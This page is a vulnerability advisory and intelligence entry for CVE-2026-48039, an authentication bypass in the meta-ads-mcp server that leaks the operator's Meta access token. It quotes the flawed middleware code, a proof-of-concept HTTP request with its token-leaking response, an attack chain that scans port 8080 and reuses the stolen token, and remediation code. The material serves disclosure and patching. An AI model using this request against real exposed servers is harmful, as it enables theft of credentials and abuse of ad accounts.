What is the CVSS score of CVE-2026-48039?

CVE-2026-48039 has a CVSS 3.1 base score of 9.1 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N. EPSS exploitation probability: 0.1%.

Which versions of Meta Ads MCP are affected by CVE-2026-48039?

pipeboard-co/meta-ads-mcp versions through 1.0.108 allow unauthenticated remote attackers to exfiltrate long-lived Meta Graph API access tokens, enabling complete compromise of connected Meta Ads…. A patch is available.

Is there a public PoC exploit available for CVE-2026-48039?

Yes, a public proof-of-concept exploit is available for CVE-2026-48039. Prioritise patching immediately. EPSS: 0.1%.

How to fix or mitigate CVE-2026-48039?

Within 24 hours: Immediately disable the HTTP-reachable service or restrict network access to trusted networks only; rotate all Meta Graph API access tokens in Meta Business Manager; audit access logs for unauthorized activity. Within 7 days: Implement Web Application Firewall (WAF) rules to block unauthenticated requests to the service; review all Meta Ads account activity for unauthorized changes (campaigns, budgets, audiences). Within 30 days: Evaluate migration to patched versions or alternative solutions; implement comprehensive API activity monitoring with alerts for token usage anomalies.

Meta Ads MCP CVE-2026-48039

CRITICAL

Error Message Information Leak (CWE-209)

2026-06-11 https://github.com/pipeboard-co/meta-ads-mcp

GHSA-9gw6-46qc-99vr

Python Authentication Bypass Information Disclosure Docker

9.1

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

9.1 CRITICAL

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

vuln.today AI

9.1 CRITICAL

Network-reachable HTTP endpoint, no auth or interaction required, full token disclosure and arbitrary tool invocation give C:H and I:H; no direct availability impact on the MCP host.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

None

Lifecycle Timeline

Source Code Evidence Fetched

Jun 11, 2026 - 13:56 vuln.today

Analysis Generated

Jun 11, 2026 - 13:56 vuln.today

CVE Published

Jun 11, 2026 - 13:28 github-advisory

CRITICAL 9.1

DescriptionGitHub Advisory

Unauthenticated HTTP MCP Tool Execution Leaks Operator Meta Access Token

Field	Value
Repository	pipeboard-co/meta-ads-mcp
Affected version	≤ 1.0.101 (commit 496c988 ~ 7d14226); Versions 1.0.102-1.0.105 lack git tags, so patch status is unconfirmed.
Vulnerability	CWE-287 - Improper Authentication
Severity	Critical
CVSS 3.1	9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

Summary

AuthInjectionMiddleware.dispatch() at http_auth_integration.py:272 unconditionally forwards unauthenticated Streamable HTTP requests to downstream MCP tool handlers without issuing a 401 response, allowing any network-reachable caller to invoke MCP tools without authentication. When no per-request credential is present, tool handlers fall back to the META_ACCESS_TOKEN environment variable, and when the downstream Meta Graph API call fails, api.py:263-269 serialises the raw httpx request URL-including the operator's access_token as a query parameter-into the JSON-RPC response body, delivering the credential to the unauthenticated caller.

Affected Code

meta_ads_mcp/core/http_auth_integration.py:272 - middleware unconditionally calls call_next(request) even when no auth headers are present

python

        if not auth_token and not pipeboard_token:
            logger.warning("HTTP Auth Middleware: No authentication tokens found in headers")

        try:
            response = await call_next(request)
# line 272: no 401 returned
            return response
        finally:
            if auth_token:
                FastMCPAuthIntegration.clear_auth_token()
            if pipeboard_token:
                FastMCPAuthIntegration.clear_pipeboard_token()

meta_ads_mcp/core/api.py:136 - operator token appended to URL query parameters, exposed verbatim in Graph API error response request_url

python

    request_params = params or {}
    request_params["access_token"] = access_token

Unauthenticated HTTP POST /mcp → AuthInjectionMiddleware.dispatch():272 (no 401 returned) → tool handler invokes make_api_request() using META_ACCESS_TOKEN env fallback → request_params["access_token"]:136 (token in URL) → Graph API error path at api.py:263-269 returns request_url containing access_token=… in 200 OK JSON-RPC response.

Proof of Concept

Step 1 - POST /mcp with no auth headers: HTTP 200 OK with operator access_token in request_url - proves unauthenticated tool execution and operator credential leakage.

bash

docker run --rm -p 127.0.0.1:8080:8080 -e META_ACCESS_TOKEN=FAKE_TOKEN_FOR_POC_DEMO_123456789 meta-ads-mcp-vuln001 &
python3 poc.py

http

POST /mcp HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/json
Accept: application/json, text/event-stream

{"jsonrpc":"2.0","method":"tools/call","id":2,"params":{"name":"get_ad_accounts","arguments":{"limit":1}}}

http

HTTP/1.1 200 OK
Content-Type: application/json

{
  "jsonrpc": "2.0",
  "id": 2,
  "result": {
    "content": [
      {
        "type": "text",
        "text": "{\"data\": \"{\\n  \\\"error\\\": {\\n    \\\"message\\\": \\\"HTTP Error: 400\\\",\\n    \\\"details\\\": {\\n      \\\"error\\\": {\\n        \\\"message\\\": \\\"Invalid OAuth access token data.\\\",\\n        \\\"type\\\": \\\"OAuthException\\\",\\n        \\\"code\\\": 190\\n      }\\n    },\\n    \\\"full_response\\\": {\\n      \\\"status_code\\\": 400,\\n      \\\"url\\\": \\\"https://graph.facebook.com/v24.0/me/adaccounts?...&access_token=FAKE_TOKEN_FOR_POC_DEMO_123456789\\\",\\n      \\\"request_url\\\": \\\"https://graph.facebook.com/v24.0/me/adaccounts?fields=id%2Cname%2Caccount_id%2Caccount_status%2Camount_spent%2Cbalance%2Ccurrency%2Cage%2Cbusiness_city%2Cbusiness_country_code&limit=1&access_token=FAKE_TOKEN_FOR_POC_DEMO_123456789\\\"\\n    }\\n  }\\n}\"}"
      }
    ],
    "isError": false
  }
}

Impact

An unauthenticated attacker who can reach the MCP server's HTTP port (default 8080) can invoke any registered MCP tool as the operator, consuming the operator's Meta Ads API quota and performing read or write operations on connected Meta ad accounts. When any tool call triggers a Graph API error, the operator's META_ACCESS_TOKEN is returned verbatim in the request_url field of the 200 OK JSON-RPC response, enabling the attacker to exfiltrate the long-lived credential and subsequently access the Meta Graph API directly outside the MCP interface.

Remediation

In AuthInjectionMiddleware.dispatch() (http_auth_integration.py), return a 401 Unauthorized response when neither auth_token nor pipeboard_token is present, instead of falling through to call_next:

python

from starlette.responses import Response

if not auth_token and not pipeboard_token:
    return Response(
        content='{"error":"Unauthorized"}',
        status_code=401,
        media_type="application/json",
    )

In make_api_request() (api.py), strip access_token from the request_url in error payloads, or transmit the token via an Authorization: Bearer header rather than a URL query parameter to prevent it from appearing in URLs, server logs, or error responses.

Articles & Coverage 2

News 6 New Python Vulnerabilities - 1 Critical, 5 High, 3 With POC Jun 12, 2026 News Critical Authentication Bypass in pipeboard-co/meta-ads-mcp MCP Server - CVE-2026-48039 Jun 11, 2026

AnalysisAI

Unauthenticated remote attackers can invoke MCP tool handlers and exfiltrate the operator's long-lived Meta Graph API access token from pipeboard-co/meta-ads-mcp through version 1.0.108 when the server is run with the streamable-HTTP transport on a network-reachable port. The AuthInjectionMiddleware silently forwards requests lacking an Authorization or X-PIPEBOARD-API-TOKEN header, tool handlers fall back to the META_ACCESS_TOKEN environment variable, and Graph API error responses echo the request URL - including the token query parameter - back to the caller. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Scan for exposed port 8080

Delivery

Send unauthenticated POST /mcp tools/call

Exploit

Middleware forwards without 401

Execution

Tool handler uses META_ACCESS_TOKEN env fallback

Persist

Graph API error echoes token in request_url

Impact

Reuse token against graph.facebook.com for ad-account abuse

Access

Scan for exposed port 8080

Delivery

Send unauthenticated POST /mcp tools/call

Exploit

Middleware forwards without 401

Execution

Tool handler uses META_ACCESS_TOKEN env fallback

Persist

Graph API error echoes token in request_url

Impact

Reuse token against graph.facebook.com for ad-account abuse

Vulnerability AssessmentAI

Exploitation	Exploitation requires that the target operator runs meta-ads-mcp <= 1.0.108 with --transport streamable-http bound to a network-reachable interface (default TCP port 8080) and has the META_ACCESS_TOKEN environment variable set so tool handlers have a credential to fall back to. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 Critical) is consistent with the description: any network-reachable caller can hit the default port 8080, no authentication or user interaction is required, and the PoC demonstrates both confidentiality loss (token leak) and integrity impact (tool invocation can write to ad accounts). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker scans the internet (or an internal network) for port 8080 hosting a meta-ads-mcp streamable-HTTP endpoint and sends a single unauthenticated POST /mcp containing a JSON-RPC tools/call for get_ad_accounts with no Authorization header. The server falls through the broken middleware, invokes the tool using the operator's META_ACCESS_TOKEN, and the Meta Graph API error response embeds that token verbatim in the request_url field of the 200 OK reply. …
Remediation	Vendor-released patch: upgrade to meta-ads-mcp 1.0.109 (https://github.com/pipeboard-co/meta-ads-mcp/releases/tag/1.0.109), which makes the HTTP middleware return 401 with WWW-Authenticate: Bearer when no Authorization: Bearer or X-PIPEBOARD-API-TOKEN header is present and redacts access_token and appsecret_proof from the url and request_url fields of Graph API error payloads. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Immediately disable the HTTP-reachable service or restrict network access to trusted networks only; rotate all Meta Graph API access tokens in Meta Business Manager; audit access logs for unauthorized activity. …

Threat intelligence, references, and detailed analysis are available after sign-in.